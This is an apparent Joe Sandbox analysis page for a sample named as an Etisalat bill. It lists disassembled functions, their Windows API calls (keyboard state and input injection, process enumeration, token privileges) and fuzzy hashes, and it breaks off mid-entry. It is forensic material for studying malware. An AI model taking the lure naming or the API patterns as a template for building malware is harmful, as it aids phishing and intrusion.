Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388e18e054701a0d3e1f4aaf335733847804b313a42ed2947b1401b14e082062
Instruction ID: 7badada756d7fd85f66ebaa0e467f52ddca7bb17b0b174905abaade70d9f6469
Opcode Fuzzy Hash: 388e18e054701a0d3e1f4aaf335733847804b313a42ed2947b1401b14e082062
Instruction Fuzzy Hash: 3D41CF75A00244EFE724DE3CC841BAABBAAFB88720F11462FF141DB382D77199018791

Function 009156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00915783
GetLastError.KERNEL32(?,00000000), ref: 009157A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009157CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009157FA

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: bbcda836b6600244e121f94fd970b1bfbe309e05bac2537320c09a9b581f50d6
Instruction ID: 51906b4e2e2d014bf4eaf03d8b8375a0b1cd442963a00031d98dce946e20dcbd
Opcode Fuzzy Hash: bbcda836b6600244e121f94fd970b1bfbe309e05bac2537320c09a9b581f50d6
Instruction Fuzzy Hash: B2411F39600614DFDB11EF19C545A5EBBE6FF89310B19C488E84AAB762CB34FD40DB91

Function 008DD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,008C6D71,00000000,00000000,008C82D9,?,008C82D9,?,00000001,008C6D71,8BE85006,00000001,008C82D9,008C82D9), ref: 008DD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008DD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008DD9AB
__freea.LIBCMT ref: 008DD9B4

Part of subcall function 008D3820: RtlAllocateHeap.NTDLL(00000000,?,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6,?,008A1129), ref: 008D3852

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2c5cddd5e7b34bb44133d9fcd1e58b6ad0ab26b3b985dd43e4e12724065cc8b4
Instruction ID: 00710c0cc3e5b5dc7becf3dbd30357b73bfa212be6445b713aedd54a74a51b89
Opcode Fuzzy Hash: 2c5cddd5e7b34bb44133d9fcd1e58b6ad0ab26b3b985dd43e4e12724065cc8b4
Instruction Fuzzy Hash: 2531D072A0020ABBDF249F68DC91EAE7BA5FB40310F054269FC04E7250EB36DD50DB91

Function 009352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00935352
GetWindowLongW.USER32(?,000000F0), ref: 00935375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00935382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009353A8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: fd6e5f814914ccd4f1496ce1d39db65a857cfe4832a563f73858a6862287421a
Instruction ID: 68e47fe6b47f4d935e47636401d840bb5f46057c017dedf502ed6440898bdf1a
Opcode Fuzzy Hash: fd6e5f814914ccd4f1496ce1d39db65a857cfe4832a563f73858a6862287421a
Instruction Fuzzy Hash: 6231C575A59A08EFEB349F18CC06BE8776AEB0D3D0F594501FA10961E1C7B49D80EF42

Function 0090AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0090ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0090AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0090AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0090ACC6

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3bb0ef27bb883d212ec6a44d9ba7d98e22cdbb6862a64a78f635a98b8670afb0
Instruction ID: 428d155513763f1690146663b0514c28b182645b7071428eabdd40eefad75dec
Opcode Fuzzy Hash: 3bb0ef27bb883d212ec6a44d9ba7d98e22cdbb6862a64a78f635a98b8670afb0
Instruction Fuzzy Hash: C5312470A04728AFFF35CB658C097FE7BA9AB89310F05471AE4C5961D1C3788D8197D2

Function 00937674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0093769A
GetWindowRect.USER32(?,?), ref: 00937710
PtInRect.USER32(?,?,00938B89), ref: 00937720
MessageBeep.USER32(00000000), ref: 0093778C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 00ea199bd289b865f8b49f332a6a3b74cd1719e6a4e35fb0e1a6fba81b8456f0
Instruction ID: 182fa0473dd92b5ba9a80ff003670deb422c88702bb8eb9869e65cb3227c96b2
Opcode Fuzzy Hash: 00ea199bd289b865f8b49f332a6a3b74cd1719e6a4e35fb0e1a6fba81b8456f0
Instruction Fuzzy Hash: DA41AEB5609219EFCB21CF98D895FA9B7F5FF49314F1440A8E5169B261C330E942DF90

Function 009316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009316EB

Part of subcall function 00903A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00903A57
Part of subcall function 00903A3D: GetCurrentThreadId.KERNEL32 ref: 00903A5E
Part of subcall function 00903A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009025B3), ref: 00903A65

GetCaretPos.USER32(?), ref: 009316FF
ClientToScreen.USER32(00000000,?), ref: 0093174C
GetForegroundWindow.USER32 ref: 00931752

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 8645950bc59b298bfe7d7245cade2619e92bdbfffe5379a9f47bdc6b6249cf0b
Instruction ID: 4f940a589185f28efb29e6a31f815262127e7326d1b079181abf793eec4077a4
Opcode Fuzzy Hash: 8645950bc59b298bfe7d7245cade2619e92bdbfffe5379a9f47bdc6b6249cf0b
Instruction Fuzzy Hash: C3315071E00109AFD700DFA9C881DAEB7FDFF89304B548069E416E7611EA319E45CFA1

Function 0090D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0090D501
Process32FirstW.KERNEL32(00000000,?), ref: 0090D50F
Process32NextW.KERNEL32(00000000,?), ref: 0090D52F
CloseHandle.KERNEL32(00000000), ref: 0090D5DC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 65332f9f26b82c30e1406629de1f772d25a5badf74740c3cb08290432b4290cd
Instruction ID: 23aec0889eedeb5002fa7185ad7d14c25772809deddcb79847a152afbbaaf6e6
Opcode Fuzzy Hash: 65332f9f26b82c30e1406629de1f772d25a5badf74740c3cb08290432b4290cd
Instruction Fuzzy Hash: 5C317E711082009FD304EF94CC81AAFBBE8FF9A354F14092DF581962A1EB71A945DB93

Function 00938FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

GetCursorPos.USER32(?), ref: 00939001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008F7711,?,?,?,?,?), ref: 00939016
GetCursorPos.USER32(?), ref: 0093905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008F7711,?,?,?), ref: 00939094

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 63edf49b1bb08b460545ccda31c54e9e9f23cddc0c65fb2ca608ed86d8ec253b
Instruction ID: 1ec2a7fc95b5555c73709164ec20dbd0eb3fabe2a6eb0d047da48692d5ef8b03
Opcode Fuzzy Hash: 63edf49b1bb08b460545ccda31c54e9e9f23cddc0c65fb2ca608ed86d8ec253b
Instruction Fuzzy Hash: 4621BF36615118EFCB298F98C858FEA3BB9EB49360F004055F90597261C3719D90EF60

Function 0090D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0093CB68), ref: 0090D2FB
GetLastError.KERNEL32 ref: 0090D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0090D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0093CB68), ref: 0090D376

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 802bf77f3833d8dcf5cb9f0ec00db042c1ad2a0e4d86669828eb9fd07cba7b4f
Instruction ID: e6a4b4055bffe489523d6dca259c16fda3a0155affa44ca533ea822def29b2d9
Opcode Fuzzy Hash: 802bf77f3833d8dcf5cb9f0ec00db042c1ad2a0e4d86669828eb9fd07cba7b4f
Instruction Fuzzy Hash: A2217F7150A3019FC710DF68C88186AB7E8FE96768F104A1DF4A9D72E1D731DA46CB93

Function 00901571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00901014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0090102A
Part of subcall function 00901014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00901036
Part of subcall function 00901014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00901045
Part of subcall function 00901014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0090104C
Part of subcall function 00901014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00901062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009015BE
_memcmp.LIBVCRUNTIME ref: 009015E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00901617
HeapFree.KERNEL32(00000000), ref: 0090161E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: f55000c8e80c7b692fa3176f8d1d1cc5061a17803d5a88f049f0edc3a0d72aa0
Instruction ID: 6bee8ebb9c5663809c43a63fe9f58e8bf591bbd7c5eb915e078ba52a9b67e4c3
Opcode Fuzzy Hash: f55000c8e80c7b692fa3176f8d1d1cc5061a17803d5a88f049f0edc3a0d72aa0
Instruction Fuzzy Hash: F4214872E00109EFDF14DFA4CD49BEEB7B8EF84354F184459E441AB281E771AA45DBA0

Function 00932782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0093280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00932824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00932832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00932840

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ea1222cb3dc72c5671e0b974fd16b2b736bf978109175bd1298787d7719a3443
Instruction ID: 48b95077e9951dde59fc28654ea7643a39b4942ab00000776c95bcf2d54642c1
Opcode Fuzzy Hash: ea1222cb3dc72c5671e0b974fd16b2b736bf978109175bd1298787d7719a3443
Instruction Fuzzy Hash: C421B031608611AFE7149B24C855FAA7B99FF86324F148158F426CB6E2CB75FC82CF91

Function 009078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00908D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0090790A,?,000000FF,?,00908754,00000000,?,0000001C,?,?), ref: 00908D8C
Part of subcall function 00908D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00908DB2
Part of subcall function 00908D7D: lstrcmpiW.KERNEL32(00000000,?,0090790A,?,000000FF,?,00908754,00000000,?,0000001C,?,?), ref: 00908DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00908754,00000000,?,0000001C,?,?,00000000), ref: 00907923
lstrcpyW.KERNEL32(00000000,?), ref: 00907949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00908754,00000000,?,0000001C,?,?,00000000), ref: 00907984

Strings

cdecl, xrefs: 0090797B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f8af9dbe6ab388f65dd4c9ec59640c1ba6f9845f65b9686c2617a7a3afb21a0d
Instruction ID: 23b9c6f62ae0c5054ae950cf99e4e14224cd9c19ff22ea55044bb70c2bf5f59e
Opcode Fuzzy Hash: f8af9dbe6ab388f65dd4c9ec59640c1ba6f9845f65b9686c2617a7a3afb21a0d
Instruction Fuzzy Hash: E811E43A204201AFCB155F78C845E7BB7A9FF853A0B00402AF942CB2A4EB319811D7A1

Function 00937CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00937D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00937D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00937D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0091B7AD,00000000), ref: 00937D6B

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 6ce69214151e82104c88c1cdce84669b835b34f1e574c1f6f81444daa91f2bde
Instruction ID: db391f67abcce8fb7662f7bd232ee0b46defd15677a233bb11e8a18aadca3f14
Opcode Fuzzy Hash: 6ce69214151e82104c88c1cdce84669b835b34f1e574c1f6f81444daa91f2bde
Instruction Fuzzy Hash: CD11D2B2118655AFCB208F68DC04AA67BA8AF45360F118724F939D72F0D7308951EF50

Function 00935660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009356BB
_wcslen.LIBCMT ref: 009356CD
_wcslen.LIBCMT ref: 009356D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00935816

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: b1ba712644eead9c3642cd5f52b08c28060ecb67bc23cb6c1581961873ed46a8
Instruction ID: bd22d7acb7ecd04194e686aa6bfd4ef04c6175f4f78f93a713c90b27c3908558
Opcode Fuzzy Hash: b1ba712644eead9c3642cd5f52b08c28060ecb67bc23cb6c1581961873ed46a8
Instruction Fuzzy Hash: 5811037560061896DB20DF65CC86AEE77BCFF09764F50442AF905D6091EB74CA84CF60

Function 00901A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00901A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00901A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00901A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00901A8A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24167ada9014aa724f02c677121b5de5686c55f3a126e221efb24b1966966e5d
Instruction ID: d34deb2e8c2f2621d00756277af96903a9bf4bc76f91fa3df6b94d8fdbfad89a
Opcode Fuzzy Hash: 24167ada9014aa724f02c677121b5de5686c55f3a126e221efb24b1966966e5d
Instruction Fuzzy Hash: B011F77AA01219FFEF119BA5CD85FADBBB8EB08754F200091EA04B7290D6716E50DB94

Function 0090E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0090E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0090E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0090E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0090E24D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 0e0099c390c996c0fe1f4bfbdb290cf3ea5f85a0a3873f70dde96a131fabd4f7
Instruction ID: 5588df4665368a71fac795fccd6ca66686e3d15dc2049e587a44dbfe6004bf93
Opcode Fuzzy Hash: 0e0099c390c996c0fe1f4bfbdb290cf3ea5f85a0a3873f70dde96a131fabd4f7
Instruction Fuzzy Hash: 181108B691C214BFC7019BAC9C09A9E7FACEB45314F004619F824E32D0D270CD009BA0

Function 008CD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

